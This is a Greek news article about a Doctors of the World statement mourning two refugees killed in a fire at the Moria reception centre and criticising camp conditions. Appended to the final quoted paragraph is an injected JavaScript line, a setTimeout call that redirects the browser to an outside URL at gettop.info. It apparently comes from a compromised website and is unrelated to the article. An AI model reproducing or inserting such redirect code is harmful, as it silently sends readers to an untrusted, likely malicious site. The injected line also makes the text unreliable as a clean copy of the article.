Οι Γιατροί του Κόσμου για τον χαμό των δύο προσφύγων στη Μόρια

0
3

 

Σε ανακοίνωσή τους οι Γιατροί του Κόσμου εκφράζουν τη βαθιά οδύνη τους για τον τραγικό χαμό των δύο προσφύγων από την πυρκαγιά στο κέντρο υποδοχής της Μόριας. Επιπλέον, καλούν τις Αρχές να λάβουν όλα τα απαραίτητα μέτρα για τη βελτίωση των συνθηκών διαβίωσης και της ασφάλειας εντός των κέντρων φιλοξενίας σε όλη τη χώρα.

Όπως περιγράφουν, κλιμάκιο της οργάνωσης παρέμεινε μέχρι τις πρώτες πρωινές ώρες εντός του κέντρου, περιθάλποντας τραυματίες και βοηθώντας όλους όσοι είχαν ανάγκη. Σήμερα, επέστρεψαν κανονικά εντός του κέντρου, λειτουργώντας τα ιατρεία της οργάνωσης και παρέχοντας πλήρη ιατρική και ψυχοκοινωνική κάλυψη.

«Τραγικά περιστατικά σαν το χθεσινό αναδεικνύουν τις ακατάλληλες συνθήκες διαβίωσης υπό τις οποίες ζουν οι άνθρωποι που έφτασαν στη χώρα μας ως πρόσφυγες και μετανάστες», επισημαίνουν και κάνουν λόγο για χώρους φιλοξενίας «χωρίς επίσημο καθεστώς και κανονισμούς λειτουργίας, ακατάλληλους για χειμερινή διαβίωση και με ελλιπείς παρεχόμενες υπηρεσίες για τους διαβιούντες σε αυτά».

«Η διαβίωση ανθρώπων σε αξιοπρεπείς και ασφαλείς συνθήκες είναι πέρα και πάνω από οποιαδήποτε ανάγκη για απαρέγκλιτη τήρηση της Συμφωνίας ΕΕ και Τουρκίας», προσθέτουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here